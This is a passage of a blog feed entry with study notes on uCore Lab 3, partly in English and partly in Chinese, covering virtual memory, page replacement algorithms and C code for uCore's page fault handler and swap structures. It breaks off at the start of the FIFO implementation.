    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore Labs - Lab3</title>
    <link href="https://kiprey.github.io/2020/08/uCore-3/"/>
    <id>https://kiprey.github.io/2020/08/uCore-3/</id>
    <published>2020-08-12T14:25:53.000Z</published>
    <updated>2025-11-24T03:59:40.150Z</updated>
    
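    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><ul><li>These are notes I wrote while working through <code>uCore</code> Lab 3.</li><li>They cover virtual memory management and page swapping.</li><li>The post is long, so using the navigation bar on the right is recommended.</li></ul><span id="more"></span><h2 id="知识点">Key Concepts</h2><h3 id="1-虚拟内存">1. Virtual Memory</h3><ul><li><p>Virtual memory is the “memory” that the CPU sees.</p><ul><li>The physical memory cell backing a virtual address may not exist.</li><li>A virtual address and the physical address it maps to may differ.</li><li>A memory-mapping mechanism implemented by the operating system translates each accessed virtual address into a physical address.</li></ul></li><li><p>When a memory access hits a special case, the CPU raises interrupt vector 14 and runs the page fault handler.</p><ul><li><p>There are three such cases:</p><ul><li><strong>Writing</strong> to a virtual page whose <strong>physical page is present</strong> (for example, <strong>copy-on-write</strong>).</li><li>Reading or writing a virtual page that has no physical page: a <strong>missing page</strong>.</li><li>Violating the access permissions.</li></ul></li><li><p>When a page fault is triggered, the CPU stores the faulting linear address in the <strong>CR2</strong> register and pushes the <strong>page fault error code</strong> onto the interrupt stack.</p><blockquote><p>In the error code, bit 0 is 0 when the physical page is not present and 1 when a present page caused a protection violation; bit 1 is 1 for a write access and 0 for a read; bit 2 is 1 when the access came from user mode and 0 when it came from kernel mode.</p></blockquote></li></ul></li><li><p>Because the virtual address space is much larger than physical memory, rarely used pages have to be moved out to external storage at suitable times, and pages that are about to be used have to be brought back in. <strong>This process is transparent to applications.</strong> When to move pages in and out, and which page to evict, are exactly the questions a page replacement algorithm answers.</p></li></ul><h3 id="2-页面置换算法小叙">2. A Brief Look at Page Replacement Algorithms</h3><blockquote><p>When physical pages run short, some page has to be swapped out to external storage.</p><p>Which physical page should go? That is what a page replacement algorithm decides.</p></blockquote><h4 id="I-局部页面置换算法">I. Local Page Replacement Algorithms</h4><blockquote><p>The victim is chosen only from the physical pages owned by the current process.</p></blockquote><h5 id="1-最近最少用算法（LRU）">1) Least Recently Used (LRU)</h5><h6 id="a-简介">a. Overview</h6><ul><li>Idea: evict the page that has <strong>gone unreferenced for the longest time</strong>.</li><li>Implementation: on a page fault, compute the last access time of every logical page in memory and pick the page whose <strong>last use is furthest in the past</strong>.</li><li>Property: an approximation of the optimal replacement algorithm.</li></ul><h6 id="b-具体实现">b. Implementation</h6><ul><li>Page list<ul><li>The system maintains a list of pages ordered by most recent access time<ul><li>The head of the list is the most recently used page</li><li>The tail of the list is the least recently used page</li></ul></li><li>On a memory access, find the page and move it to the head of the list</li><li>On a page fault, evict the page at the tail of the list</li></ul></li><li>Active page stack<ul><li>On a page access, push the page number onto the top of the stack and remove any earlier copy of the same page number from the stack</li><li>On a page fault, evict the page at the bottom of the stack.</li></ul></li></ul><blockquote><p>Both implementations have to maintain and search a data structure on every access,</p><p>and LRU tracks past accesses in <strong>more detail than necessary</strong>, so the method is relatively complex.</p></blockquote><h5 id="2-改进的时钟页面置换算法（Clock）">2) Enhanced Clock Page Replacement (Clock)</h5><h6 id="a-简介-2">a. 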
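Overview</h6><ul><li>Idea:<ul><li>Keep only a rough record of page accesses</li><li>Reduce the page fault cost of modified pages</li></ul></li><li>Data structures:<ul><li>An accessed bit in each page table entry records whether the page was accessed in the recent past.</li><li>A dirty bit in each page table entry records whether the page has been modified but not yet written back to external storage.</li><li>The pages form a circular list, with a pointer at the page that was loaded earliest.</li></ul></li><li>Algorithm<ul><li>On a page access, record the access in the page table entry</li><li>On a page fault, scan forward from the pointer for a page that is <strong>neither accessed nor modified</strong> and evict it.</li></ul></li><li>Property: the clock algorithm is a compromise between LRU and FIFO.</li></ul><h6 id="b-具体实现-2">b. Implementation</h6><ul><li>When a page is loaded into memory, its accessed bit is initialized to 0</li><li>When a page is accessed (read or write), its accessed bit is set to 1</li><li>On a page fault, scan the circular list starting from the pointer's current position.<ul><li>If the accessed bit of the current page is 0, <strong>evict that page</strong></li><li>If the accessed bit of the current page is 1, <strong>clear its accessed bit to 0</strong> and advance the pointer to the next page, repeating until an evictable page is found.</li></ul></li></ul><h4 id="II-全局置换算法">II. Global Replacement Algorithms</h4><ul><li>Idea: a global replacement algorithm gives each process a variable number of physical pages.</li><li>Problems to solve:<ul><li>A process's memory demand changes from phase to phase.</li><li>The memory allocated to the process has to change accordingly.</li><li>The algorithm has to decide how many physical pages each process gets.</li></ul></li><li>CPU utilization and the number of concurrent processes constrain each other.<ul><li>With few processes, adding concurrent processes raises CPU utilization.</li><li>More concurrent processes mean more memory accesses.</li><li>Memory accesses from many concurrent processes weaken the locality of reference.</li><li>Weaker locality raises the page fault rate and lowers CPU utilization.</li></ul></li></ul><h5 id="1-工作集置换算法">1) Working-Set Replacement</h5><h6 id="a-工作集与常驻集">a. Working Set and Resident Set</h6><ul><li>The <strong>working set</strong> is the set of <strong>logical pages</strong> a process is currently using, written as a function of two arguments, $W(t, \Delta)$<ul><li>$t$ is the current execution time</li><li>$\Delta$ is the <strong>working-set window</strong>, a fixed-length window of page access time.</li><li>$W(t, \Delta)$ is the set of <strong>all pages accessed</strong> within the window of length $\Delta$ that ends at the current time $t$.</li><li>$|W(t, \Delta)|$ is the size of the working set, that is, its number of pages.</li></ul></li><li>The <strong>resident set</strong> is the set of pages <strong>actually resident</strong> in memory at the current time.</li><li>How the two relate<ul><li>The working set is an inherent property of the running process</li><li>The resident set depends on the number of physical pages the system gives the process and on the page replacement algorithm.</li></ul></li></ul><h6 id="b-思路">b. Idea</h6><ul><li><p>The pages referenced by the last $\tau$ memory accesses before the current time form the working set, where $\tau$ is the <strong>window size</strong> (it plays the role of $\Delta$ above).</p></li><li><p>Evict pages that are not in the working set</p></li></ul><h6 id="c-具体实现">c. Implementation</h6><ul><li>Access list: tracks the pages accessed within the window</li><li><strong>On a memory access, evict pages that are no longer in the working set;</strong> then update the access list.</li><li>On a page fault, bring the page in and update the access list.</li></ul><h5 id="2-缺页率置换算法（PPF）">2) Page-Fault-Frequency Replacement (PFF)</h5><h6 id="a-简介-3">a. Overview</h6><p>Adjust the size of the resident set so that each process's page fault rate stays within a reasonable range.</p><ul><li>If a process's page fault rate is too high, grow its resident set to give it more physical memory</li><li>If a process's page fault rate is too low, shrink its resident set to reduce its number of physical pages.</li></ul><h6 id="b-具体实现-3">b. 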
具体实现</h6><ul><li>访存时，设置引用位标志</li><li>缺页时，计算从上次缺页时间$t_{last}$到现在$t_{current}$的时间间隔<ul><li>如果$t_{current}-t_{last}&gt;T$，则置换所有在$[t_{last}, t_{current}]$时间内<strong>没有被引用</strong>的页。</li><li>如果$t_{current}-t_{last}&lt;T$，则增加缺失页到常驻集中。</li></ul></li></ul><h4 id="III-Belady现象">III. Belady现象</h4><ul><li>现象： 采用FIFO等算法时，可能出现分配的物理页面数增加，缺页次数反而升高的异常情况。</li><li>原因：<ul><li>FIFO算法的置换特征与进程访问内存的动态特征矛盾</li><li>被置换出去的页面并不一定是进程近期不会访问的。</li></ul></li></ul><h3 id="3-uCore虚拟内存机制的实现">3. uCore虚拟内存机制的实现</h3><h4 id="I-虚拟内存管理">I. 虚拟内存管理</h4><ul><li><p>结构体变量<code>check_mm_struct</code>用于管理虚拟内存页面，其结构体如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// the control struct for a set of vma using the same PDT</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">mm_struct</span> &#123;</span><br><span class="line">    <span class="type">list_entry_t</span> mmap_list;        <span class="comment">// 按照虚拟地址顺序双向连接的虚拟页链表</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">vma_struct</span> *mmap_cache; <span class="comment">// 当前使用的虚拟页地址，该成员加速页索引速度。</span></span><br><span class="line">    <span class="type">pde_t</span> *pgdir;                  <span class="comment">// 虚拟页对应的PDT</span></span><br><span class="line">    <span class="type">int</span> map_count;                 <span class="comment">// 虚拟页个数</span></span><br><span class="line">    <span class="type">void</span> *sm_priv;                 <span class="comment">// 用于指向swap manager的某个链表,在FIFO算法中，该双向链表用于将可交换的已分配物理页串起来</span></span><br><span 
class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>当分配出新的虚拟页时，程序会执行<code>insert_vma_struct</code>函数，此时虚拟页<code>vma_struct</code>就会被插入<code>mm_struct::mmap_list</code>双向链表中。</p></li><li><p>若程序首次访问该内存而触发缺页中断时，程序会在缺页处理程序中为该虚拟页划分出一块新的物理页。同时，还会更新<code>mm_struct::pgdir</code>上的对应页表条目，之后该页的内存访问即可正常执行。</p></li><li><p>在FIFO页面置换算法中，初始时，<code>mm_struct</code>中的<code>sm_priv</code>会被设置为<code>pra_list_head</code>。而<code>pra_list_head</code>是一个双向链表的起始结点，该双向链表用于将<strong>可交换的已分配物理页</strong>串起来。</p></li></ul><h4 id="II-页面置换">II. 页面置换</h4><ul><li><p><code>swap_manager</code>与<code>pmm_manager</code>类似，都设置了一个用于管理某个功能的模块。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">swap_manager</span></span><br><span class="line">&#123;</span><br><span class="line">     <span class="type">const</span> <span class="type">char</span> *name;</span><br><span class="line">     <span class="comment">/* Global initialization for the swap manager */</span></span><br><span class="line">     <span class="built_in">int</span> (*init)            (<span class="type">void</span>);</span><br><span class="line">     <span class="comment">/* Initialize the priv data inside mm_struct */</span></span><br><span class="line">     <span class="built_in">int</span> (*init_mm) 
        (<span class="keyword">struct</span> mm_struct *mm);</span><br><span class="line">     <span class="comment">/* Called when a tick interrupt occurred */</span></span><br><span class="line">     <span class="built_in">int</span> (*tick_event)      (<span class="keyword">struct</span> mm_struct *mm);</span><br><span class="line">     <span class="comment">/* Called when mapping a swappable page into the mm_struct */</span></span><br><span class="line">     <span class="built_in">int</span> (*map_swappable)   (<span class="keyword">struct</span> mm_struct *mm, <span class="type">uintptr_t</span> addr, <span class="keyword">struct</span> Page *page, <span class="type">int</span> swap_in);</span><br><span class="line">     <span class="comment">/* When a page is marked as shared, this routine is called to</span></span><br><span class="line"><span class="comment">      * delete the addr entry from the swap manager */</span></span><br><span class="line">     <span class="built_in">int</span> (*set_unswappable) (<span class="keyword">struct</span> mm_struct *mm, <span class="type">uintptr_t</span> addr);</span><br><span class="line">     <span class="comment">/* Try to swap out a page, return the victim */</span></span><br><span class="line">     <span class="built_in">int</span> (*swap_out_victim) (<span class="keyword">struct</span> mm_struct *mm, <span class="keyword">struct</span> Page **ptr_page, <span class="type">int</span> in_tick);</span><br><span class="line">     <span class="comment">/* check the page replacement algorithm */</span></span><br><span class="line">     <span class="built_in">int</span> (*check_swap)(<span class="type">void</span>);</span><br><span 
class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>若使用FIFO页面置换算法，则在缺页中断程序中，程序只会<strong>换入</strong>目标物理页，而不会主动换出。</p><p>只有在分配空闲物理页时，若<code>pmm_manager-&gt;alloc_pages(n)</code>失败，则程序才会执行一次页面换出，以腾出空闲的物理页，并重新分配。</p></li><li><p><code>swap_in</code>函数只会将目标物理页加载进内存中，而不会修改页表条目。所以相关的标志位设置必须在<code>swap_in</code>函数的外部手动处理。而<code>swap_out</code>函数会先执行<code>swap_out_victim</code>，找出最适合换出的物理页，并将其换出，最后刷新TLB。需要注意的是<code>swap_out</code>函数会在函数内部设置PTE，当某个页面被换出后，PTE会被设置为所换出物理页在硬盘上的偏移。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cprintf</span>(<span class="string">&quot;swap_out: i %d, store page in vaddr 0x%x to disk swap entry %d\n&quot;</span>, i, v, page-&gt;pra_vaddr/PGSIZE<span class="number">+1</span>);</span><br><span class="line">*ptep = (page-&gt;pra_vaddr/PGSIZE<span class="number">+1</span>)&lt;&lt;<span class="number">8</span>;</span><br><span class="line"><span class="built_in">free_page</span>(page);</span><br></pre></td></tr></table></figure><p>当PTE所对应的物理页存在于内存中，那么该PTE就是正常的页表条目，可被CPU直接寻址用于转换地址。但当所对应的物理页不在内存时，该PTE就成为<code>swap_entry_t</code>，保存该物理页数据在外存的偏移位置。相关代码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span 
class="comment">/*</span></span><br><span class="line"><span class="comment"> * swap_entry_t</span></span><br><span class="line"><span class="comment"> * --------------------------------------------</span></span><br><span class="line"><span class="comment"> * |         offset        |   reserved   | 0 |</span></span><br><span class="line"><span class="comment"> * --------------------------------------------</span></span><br><span class="line"><span class="comment"> *           24 bits            7 bits    1 bit</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * swap_offset - takes a swap_entry (saved in pte), and returns</span></span><br><span class="line"><span class="comment"> * the corresponding offset in swap mem_map.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> swap_offset(entry) (&#123;                                       \</span></span><br><span class="line"><span class="meta">               size_t __offset = (entry &gt;&gt; 8);                        \</span></span><br><span class="line"><span class="meta">               <span class="keyword">if</span> (!(__offset &gt; 0 &amp;&amp; __offset &lt; max_swap_offset)) &#123;    \</span></span><br><span class="line"><span class="meta">                    panic(<span class="string">&quot;invalid swap_entry_t = %08x.\n&quot;</span>, entry);    \</span></span><br><span class="line"><span class="meta">               &#125;                                                    \</span></span><br><span class="line"><span class="meta">               __offset;                                            \</span></span><br><span class="line"><span class="meta">          
&#125;)</span></span><br></pre></td></tr></table></figure></li><li><p>同时，不是所有物理页面都可以置换，例如内核关键代码和数据等等，所以在分配物理页时，需要对于那些可被置换的物理页执行<code>swap_map_swappable</code>函数，将该物理页加入到<code>mm_struct::sm_priv</code>指针所指向的双向链表中，换入和换出操作都会操作该链表（插入/移除<strong>可交换的已分配</strong>物理页）。</p></li><li><p>数据结构<code>Page</code>和<code>vma_struct</code>分别用于管理物理页和虚拟页，其结构如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 用于描述某个虚拟页的结构</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">vma_struct</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mm_struct</span> *vm_mm; <span class="comment">// 管理该虚拟页的mm_struct</span></span><br><span class="line">    <span class="type">uintptr_t</span> vm_start;      <span class="comment">// 虚拟页起始地址，包括当前地址  </span></span><br><span class="line">    <span class="type">uintptr_t</span> vm_end;        <span class="comment">// 虚拟页终止地址，不包括当前地址（地址前闭后开）  </span></span><br><span class="line">    <span class="type">uint32_t</span> vm_flags;       <span class="comment">// 相关标志位</span></span><br><span class="line">    <span class="type">list_entry_t</span> list_link;  <span class="comment">// 用于连接各个虚拟页的双向指针</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span 
class="comment">// 数据结构Page相关成员的用途已在uCore-2中介绍过，这里只提它新增的两个成员pra_*</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">Page</span> &#123;</span><br><span class="line">    <span class="type">int</span> ref;</span><br><span class="line">    <span class="type">uint32_t</span> flags;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> property;</span><br><span class="line">    <span class="type">list_entry_t</span> page_link;</span><br><span class="line">    <span class="type">list_entry_t</span> pra_page_link;     <span class="comment">// 用于连接上一个和下一个*可交换已分配*的物理页</span></span><br><span class="line">    <span class="type">uintptr_t</span> pra_vaddr;            <span class="comment">// 用于保存该物理页所对应的虚拟地址。</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><ul><li>当分配某个虚拟页<code>vma_struct</code>时，程序会在<code>insert_vma_struct</code>函数中设置其<code>vm_mm</code>成员为某个<code>mm_struct</code>，这样便于后续的管理。</li><li>在函数<code>pgdir_alloc_page</code>中，程序会设置<code>Page</code>的<code>pra_vaddr</code>成员，将其设置为当前物理页所对应的虚拟地址，之后便可通过<code>Page-&gt;pra_vaddr-&gt;pte</code>一条链，直接找到当前<strong>物理页</strong>地址所对应的PTE条目。同时，也可通过<code>pra_vaddr</code>来确定对应外存的相对偏移<code>page-&gt;pra_vaddr/PGSIZE+1</code>。</li><li><code>Page::page_link</code>用于将空闲物理页连接至双向链表中，而<code>page::pra_page_link</code>用于将<strong>可交换的已分配</strong>物理页连接至另一个双向链表中，注意两者的用途是不同的。</li></ul></li></ul><h2 id="练习解答">练习解答</h2><h3 id="1-练习0">1. 练习0</h3><blockquote><p><strong>填写已有实验</strong></p></blockquote><ul><li>抄就对了。</li></ul><h3 id="2-练习1">2. 
练习1</h3><blockquote><p><strong>给未被映射的地址映射上物理页</strong></p><p>完成do_pgfault（mm/vmm.c）函数，给未被映射的地址映射上物理页。设置访问权限 的时候需要参考页面所在 VMA 的权限，同时需要注意映射物理页时需要操作内存控制 结构所指定的页表，而不是内核的页表。</p></blockquote><p>实验代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span 
class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">do_pgfault</span><span class="params">(<span class="keyword">struct</span> mm_struct *mm, <span class="type">uint32_t</span> error_code, <span class="type">uintptr_t</span> addr)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> ret = -E_INVAL;</span><br><span class="line">    <span class="comment">// 获取触发pgfault的虚拟地址所在虚拟页</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">vma_struct</span> *vma = <span class="built_in">find_vma</span>(mm, addr);</span><br><span class="line"></span><br><span class="line">    pgfault_num++;</span><br><span class="line">    <span class="comment">// 如果当前访问的虚拟地址不在已经分配的虚拟页中</span></span><br><span class="line">    <span class="keyword">if</span> (vma == <span class="literal">NULL</span> || vma-&gt;vm_start &gt; addr) 
&#123;</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;not valid addr %x, and  can not find it in vma\n&quot;</span>, addr);</span><br><span class="line">        <span class="keyword">goto</span> failed;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Check the error code. Only the P and W/R bits are examined; the privilege (U/S) bit is ignored.</span></span><br><span class="line">    <span class="keyword">switch</span> (error_code &amp; <span class="number">3</span>) &#123;</span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">        <span class="comment">// Error code 3: write to a present page, e.g. copy-on-write</span></span><br><span class="line">        <span class="comment">// Note: default falls through to case 2, so the write permission is checked here as well.</span></span><br><span class="line">    <span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line">        <span class="comment">// Write to a page that is not present</span></span><br><span class="line">        <span class="comment">// Fail if the access is a write but the enclosing VMA is not writable</span></span><br><span class="line">        <span class="keyword">if</span> (!(vma-&gt;vm_flags &amp; VM_WRITE)) &#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;do_pgfault failed: error code flag = write AND not present, but the addr&#x27;s vma cannot write\n&quot;</span>);</span><br><span class="line">            <span class="keyword">goto</span> failed;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">1</span>: <span class="comment">/* error code flag : (W/R=0, P=1): read, present */</span></span><br><span class="line">        <span class="comment">// Read from a present page. This should not raise a page fault here, so something is wrong: fail directly</span></span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;do_pgfault failed: error 
code flag = read AND present\n&quot;</span>);</span><br><span class="line">        <span class="keyword">goto</span> failed;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0</span>: <span class="comment">/* error code flag : (W/R=0, P=0): read, not present */</span></span><br><span class="line">        <span class="comment">// Read from a page that is not present</span></span><br><span class="line">        <span class="comment">// Fail if the access is a read but the enclosing VMA is neither readable nor executable</span></span><br><span class="line">        <span class="keyword">if</span> (!(vma-&gt;vm_flags &amp; (VM_READ | VM_EXEC))) &#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;do_pgfault failed: error code flag = read AND not present, but the addr&#x27;s vma cannot read or exec\n&quot;</span>);</span><br><span class="line">            <span class="keyword">goto</span> failed;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Build the permission bits for the page table entry</span></span><br><span class="line">    <span class="type">uint32_t</span> perm = PTE_U;</span><br><span class="line">    <span class="keyword">if</span> (vma-&gt;vm_flags &amp; VM_WRITE) &#123;</span><br><span class="line">        perm |= PTE_W;</span><br><span class="line">    &#125;</span><br><span class="line">    addr = <span class="built_in">ROUNDDOWN</span>(addr, PGSIZE);</span><br><span class="line">    ret = -E_NO_MEM;</span><br><span class="line">    <span class="type">pte_t</span> *ptep=<span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* LAB3 EXERCISE 1: YOUR CODE */</span></span><br><span class="line">    <span class="comment">// Look up the page table entry for this virtual address, creating the page table if needed</span></span><br><span class="line">    <span class="keyword">if</span> ((ptep = <span class="built_in">get_pte</span>(mm-&gt;pgdir, addr, <span class="number">1</span>)) == <span 
class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;get_pte in do_pgfault failed\n&quot;</span>);</span><br><span class="line">        <span class="keyword">goto</span> failed;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// The PTE is empty: no physical page has been mapped for this address yet</span></span><br><span class="line">    <span class="keyword">if</span> (*ptep == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// Allocate a physical page and set up the page table entry</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, addr, perm) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;pgdir_alloc_page in do_pgfault failed\n&quot;</span>);</span><br><span class="line">            <span class="keyword">goto</span> failed;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">/* LAB3 EXERCISE 2: YOUR CODE */</span></span><br><span class="line">        <span class="comment">// The PTE is a swap entry: the page exists but has been swapped out of memory</span></span><br><span class="line">        <span class="comment">// Proceed only if swap has finished initializing</span></span><br><span class="line">        <span class="keyword">if</span>(swap_init_ok) &#123;</span><br><span class="line">            <span class="keyword">struct</span> Page *page=<span class="literal">NULL</span>;</span><br><span class="line">            <span class="comment">// Load the target data into a new physical page.</span></span><br><span class="line">            <span class="comment">// That page may be a free one, or one reclaimed from another allocated page</span></span><br><span class="line">            <span class="keyword">if</span> ((ret = <span class="built_in">swap_in</span>(mm, addr, 
&amp;page)) != <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="built_in">cprintf</span>(<span class="string">&quot;swap_in in do_pgfault failed\n&quot;</span>);</span><br><span class="line">                <span class="keyword">goto</span> failed;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// Map the physical page at this virtual address and set up the page table entry.</span></span><br><span class="line">            <span class="built_in">page_insert</span>(mm-&gt;pgdir, page, addr, perm);</span><br><span class="line">            <span class="comment">// The missing page is back in memory, so mark it as swappable.</span></span><br><span class="line">            <span class="built_in">swap_map_swappable</span>(mm, addr, page, <span class="number">1</span>);</span><br><span class="line">            page-&gt;pra_vaddr = addr;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;no swap_init_ok but ptep is %x, failed\n&quot;</span>,*ptep);</span><br><span class="line">            <span class="keyword">goto</span> failed;</span><br><span class="line">        &#125;</span><br><span class="line">   &#125;</span><br><span class="line">   ret = <span class="number">0</span>;</span><br><span class="line">failed:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li>Describe how the fields of a Page Directory Entry and a Page Table Entry could be useful to uCore's page replacement algorithm.<ul><li>For the PTE layout and the purpose of its flag bits, see <a href="/2020/08/uCore-2#d-%E8%99%9A%E6%8B%9F%E9%A1%B5%E8%A1%A8%E7%BB%93%E6%9E%84">uCore Lab2 - virtual page table structure</a></li></ul></li><li>If uCore's page fault service routine itself accesses memory and triggers a page access exception, what does the hardware have to do?<ul><li>Save the faulting linear (virtual) address in the CR2 register.</li><li>Push <code>EFLAGS</code>, <code>CS</code>, 
<code>EIP</code> and the error code onto the current kernel stack. The interrupt number is not pushed by the hardware; the kernel's interrupt entry stub pushes it.</li><li>The kernel's trap entry code then saves the context.</li><li>Run the new page fault handler.</li><li>Restore the context.</li><li>Resume the outer page fault service routine.</li></ul></li></ul><h3 id="3-练习2">3. Exercise 2</h3><blockquote><p><strong>Complete the FIFO-based page replacement algorithm</strong></p><p>Finish the do_pgfault function in vmm.c, and complete the map_swappable and swap_out_victim functions in swap_fifo.c, which implements the FIFO algorithm.</p></blockquote><ul><li><p>With <code>FIFO</code>, a newly added physical page is simply inserted at the head of the list, and when a page has to be swapped out we pick the page at the tail of the list.</p></li><li><p>The implementation is as follows</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> 